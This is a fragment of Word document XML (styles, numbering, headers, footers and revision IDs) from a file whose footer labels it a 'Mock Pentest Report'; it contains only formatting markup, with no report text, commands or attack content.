  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E4E822B" w14:textId="77777777" w:rsidR="00633544" w:rsidRDefault="00633544" w:rsidP="0078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9C33F" w14:textId="5689706C" w:rsidR="00341B31" w:rsidRDefault="00671F7F" w:rsidP="00341B31">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>Mock Pentest Report</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="408A5D0B" w14:textId="30A566CC" w:rsidR="00671F7F" w:rsidRDefault="00671F7F" w:rsidP="00341B31">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>NON -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A3BCA" w14:textId="77777777" w:rsidR="00633544" w:rsidRDefault="00633544" w:rsidP="0078093A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0CFE4E93" w14:textId="77777777" w:rsidR="00633544" w:rsidRDefault="00633544" w:rsidP="00780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5CA64" w14:textId="282F3EB9" w:rsidR="00FE5271" w:rsidRDefault="00FE5271">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="378608B6" wp14:editId="7DB0A333">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-152400</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1857375" cy="364365"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="1955424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24613" name="Picture 1955424613"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill rotWithShape="1">
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:srcRect l="9400" t="43600" r="7001" b="40000"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1857375" cy="364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315E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="557278E2"/>
    <w:lvl w:ilvl="0" w:tplc="E99808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7193A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89C02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B73D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6621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21DE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94D06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50793"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="311C86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131B58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E866872"/>
    <w:lvl w:ilvl="0" w:tplc="46E2CB64">
      <w:start w:val="10"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="721" w:hanging="483"/>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1" w:tplc="41C4702C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>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2" w:tplc="CF7EBDEA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2026" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="489E5596">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3093" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D644B124">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="57F4BB82">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5226" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DC0C4B26">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6293" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="61F2D9A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9DB4909A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8426" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4CFB7001"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C307F4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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2F029C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7748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13E0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7046C63C"/>
    <w:lvl w:ilvl="0" w:tplc="E99808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82F2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F29E5850"/>
    <w:lvl w:ilvl="0" w:tplc="60EA5A72">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="362"/>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1" w:tplc="3F82B9C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2D20AAE8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2B3034FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3840" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A62431A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1E34145E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9CF8755C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6720" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D31ECF98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7680" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="93489BCC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="362"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F950200"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9BCAED2"/>
    <w:lvl w:ilvl="0" w:tplc="25185524">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Boo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45806">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1964387938">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1589774060">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="123817757">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="384838955">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="609313601">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1275870052">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1026295713">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1793211203">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1374768988">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="198932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o:colormru v:ext="edit" colors="#110936,#141d2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6A"/>
    <w:rsid w:val="000012CF"/>
    <w:rsid w:val="000065F0"/>
    <w:rsid w:val="00015183"/>
    <w:rsid w:val="00024D81"/>
    <w:rsid w:val="000354F2"/>
    <w:rsid w:val="00036D96"/>
    <w:rsid w:val="00043F38"/>
    <w:rsid w:val="0005136C"/>
    <w:rsid w:val="000C3CB7"/>
    <w:rsid w:val="000D36EB"/>
    <w:rsid w:val="000E1FF9"/>
    <w:rsid w:val="000F0C59"/>
    <w:rsid w:val="000F0CFB"/>
    <w:rsid w:val="000F7C0B"/>
    <w:rsid w:val="00122BB3"/>
    <w:rsid w:val="001444DD"/>
    <w:rsid w:val="001606ED"/>
    <w:rsid w:val="001619D5"/>
    <w:rsid w:val="0019537E"/>
    <w:rsid w:val="001976BE"/>
    <w:rsid w:val="001A3D57"/>
    <w:rsid w:val="001A42F6"/>
    <w:rsid w:val="001A48B5"/>
    <w:rsid w:val="001C4F73"/>
    <w:rsid w:val="001F4050"/>
    <w:rsid w:val="00222A71"/>
    <w:rsid w:val="00234EE9"/>
    <w:rsid w:val="00295A59"/>
    <w:rsid w:val="00295F87"/>
    <w:rsid w:val="002D7B45"/>
    <w:rsid w:val="002F2A42"/>
    <w:rsid w:val="00300D79"/>
    <w:rsid w:val="003014A6"/>
    <w:rsid w:val="00302929"/>
    <w:rsid w:val="00322D1E"/>
    <w:rsid w:val="00326E62"/>
    <w:rsid w:val="00341B31"/>
    <w:rsid w:val="00344BBB"/>
    <w:rsid w:val="00396796"/>
    <w:rsid w:val="003A1406"/>
    <w:rsid w:val="003D1FE9"/>
    <w:rsid w:val="003D74C7"/>
    <w:rsid w:val="003F0C38"/>
    <w:rsid w:val="003F7007"/>
    <w:rsid w:val="00443079"/>
    <w:rsid w:val="00466C1D"/>
    <w:rsid w:val="00471C45"/>
    <w:rsid w:val="00472496"/>
    <w:rsid w:val="004833BA"/>
    <w:rsid w:val="004A1E6A"/>
    <w:rsid w:val="004B1793"/>
    <w:rsid w:val="004B5302"/>
    <w:rsid w:val="004C4EF1"/>
    <w:rsid w:val="00501579"/>
    <w:rsid w:val="0051228A"/>
    <w:rsid w:val="00531771"/>
    <w:rsid w:val="005642B6"/>
    <w:rsid w:val="0058535E"/>
    <w:rsid w:val="005970C6"/>
    <w:rsid w:val="005B7E48"/>
    <w:rsid w:val="005C19C0"/>
    <w:rsid w:val="005D3B61"/>
    <w:rsid w:val="005F282F"/>
    <w:rsid w:val="00604A75"/>
    <w:rsid w:val="00607540"/>
    <w:rsid w:val="00607D78"/>
    <w:rsid w:val="00613997"/>
    <w:rsid w:val="0061430E"/>
    <w:rsid w:val="00633544"/>
    <w:rsid w:val="00642460"/>
    <w:rsid w:val="00651173"/>
    <w:rsid w:val="006528B5"/>
    <w:rsid w:val="00664CCE"/>
    <w:rsid w:val="00671F7F"/>
    <w:rsid w:val="00694EDE"/>
    <w:rsid w:val="006C56F9"/>
    <w:rsid w:val="006D01B5"/>
    <w:rsid w:val="006E2051"/>
    <w:rsid w:val="006F587C"/>
    <w:rsid w:val="0072198C"/>
    <w:rsid w:val="00722C6E"/>
    <w:rsid w:val="00724B6F"/>
    <w:rsid w:val="007742E2"/>
    <w:rsid w:val="0078093A"/>
    <w:rsid w:val="007B4865"/>
    <w:rsid w:val="007B6385"/>
    <w:rsid w:val="007E5185"/>
    <w:rsid w:val="007F209A"/>
    <w:rsid w:val="0080645F"/>
    <w:rsid w:val="008068F7"/>
    <w:rsid w:val="0081790E"/>
    <w:rsid w:val="00860534"/>
    <w:rsid w:val="00867581"/>
    <w:rsid w:val="008A237D"/>
    <w:rsid w:val="008A3E5E"/>
    <w:rsid w:val="008B5990"/>
    <w:rsid w:val="008E0169"/>
    <w:rsid w:val="008F097C"/>
    <w:rsid w:val="008F398B"/>
    <w:rsid w:val="008F4502"/>
    <w:rsid w:val="0092223D"/>
    <w:rsid w:val="00951A03"/>
    <w:rsid w:val="009618FB"/>
    <w:rsid w:val="00984E4C"/>
    <w:rsid w:val="00991781"/>
    <w:rsid w:val="009A319C"/>
    <w:rsid w:val="009A74F0"/>
    <w:rsid w:val="009B1053"/>
    <w:rsid w:val="009C36F8"/>
    <w:rsid w:val="009E2476"/>
    <w:rsid w:val="00A07FB6"/>
    <w:rsid w:val="00A2140D"/>
    <w:rsid w:val="00A57B5A"/>
    <w:rsid w:val="00AB4277"/>
    <w:rsid w:val="00AF44E8"/>
    <w:rsid w:val="00B1185C"/>
    <w:rsid w:val="00B46056"/>
    <w:rsid w:val="00B46F5A"/>
    <w:rsid w:val="00B94616"/>
    <w:rsid w:val="00BA3F99"/>
    <w:rsid w:val="00BB6DF9"/>
    <w:rsid w:val="00BC4E50"/>
    <w:rsid w:val="00BD2591"/>
    <w:rsid w:val="00BD5C4F"/>
    <w:rsid w:val="00BF101A"/>
    <w:rsid w:val="00BF3488"/>
    <w:rsid w:val="00C07200"/>
    <w:rsid w:val="00C16200"/>
    <w:rsid w:val="00C35AB0"/>
    <w:rsid w:val="00C6734A"/>
    <w:rsid w:val="00C935C9"/>
    <w:rsid w:val="00CA5EA0"/>
    <w:rsid w:val="00CB7F23"/>
    <w:rsid w:val="00CC4615"/>
    <w:rsid w:val="00D5152F"/>
    <w:rsid w:val="00D55769"/>
    <w:rsid w:val="00DE1F3F"/>
    <w:rsid w:val="00DE4FF0"/>
    <w:rsid w:val="00E23078"/>
    <w:rsid w:val="00E45C0A"/>
    <w:rsid w:val="00E7172A"/>
    <w:rsid w:val="00E8381F"/>
    <w:rsid w:val="00EA53E1"/>
    <w:rsid w:val="00EA741E"/>
    <w:rsid w:val="00EC7147"/>
    <w:rsid w:val="00ED4C76"/>
    <w:rsid w:val="00EE3E4D"/>
    <w:rsid w:val="00F32842"/>
    <w:rsid w:val="00F45871"/>
    <w:rsid w:val="00F843E8"/>
    <w:rsid w:val="00FD4E9F"/>
    <w:rsid w:val="00FE5271"/>
    <w:rsid w:val="00FE67CF"/>
    <w:rsid w:val="00FF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10936,#141d2b"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="2"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="0EB7EC46"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7064F7F0-0155-4E8C-8C55-77F5C8FB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36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6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B6F"/>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528B5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007742E2"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007742E2"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007742E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742E2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007742E2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="007742E2"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007742E2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="62"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009C36F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5A59"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BD2591"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="960" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B94616"/>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B94616"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006F587C"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CA5EA0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00780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93A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00780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1292">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="703946822">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="313989293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="803815646">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="339820196">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="985548775">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="553003764">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1769497838">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
